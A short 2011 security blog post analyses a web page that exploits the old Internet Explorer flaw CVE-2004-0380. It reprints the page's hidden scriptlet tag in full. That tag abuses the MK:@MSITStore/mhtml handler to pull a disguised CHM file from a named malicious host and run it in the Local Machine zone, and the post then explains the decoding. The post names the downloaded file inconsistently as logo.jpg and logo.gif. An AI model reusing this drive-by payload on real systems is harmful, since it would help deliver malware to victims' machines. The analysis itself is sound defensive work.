Some exploits just do not want to go away. Case in point: an exploit for CVE-2004-0380 (yes, 2004!) that I recently found at hxxp://lixiaoxia.vhost008.cn/2.htm. The page is rather simple:
<html>
<OBJECT style="display:none;" type="text/x-scriptlet"
data="MK:@MSITStore:m
html:c:\.mht!ht
tp://http://lixiaoxia.vhost008.cn/logo.jpg ::/102%2E%68tm">
</OBJECT>
</body>
</html>
The object tag instantiates a scriptlet. A scriptlet is essentially a reusable object written as a regular web page in which the scripts follow certain conventions; think of an ActiveX control implemented in HTML and VBScript (or JScript). For the sake of historical completeness: scriptlets were introduced in Internet Explorer 4, deprecated in Internet Explorer 5, and disabled by default in Internet Explorer 7. Talk about a successful technology…
After a simple decoding step (joining the line-broken attribute value, dropping the stray whitespace and percent-decoding 102%2E%68tm), the data attribute of the scriptlet reveals the URL
MK:@MSITStore:mhtml:c:\.mht!http://http://lixiaoxia.vhost008.cn/logo.jpg::/102.htm
This is the classic CVE-2004-0380 (MS04-013) pattern: the ITS protocol handler is pointed at a local MHTML file, c:\.mht, that does not exist on the victim's machine, so it falls back to the location after the "!", and ::/102.htm names the page to load from inside that archive, which means logo.jpg must be a CHM (ITS) file rather than an image. On a vulnerable system this causes the malware to be downloaded to the victim's computer and 102.htm to be rendered from it with the privileges of the Local Machine zone, instead of the Internet zone the page came from.
The malware logo.gif has surprisingly good detection on VirusTotal (34/41!). I wonder if it has also been around since 2004…
Posted on 08 February 2011. Tags: CVE20040380, Exploit, Kicking, still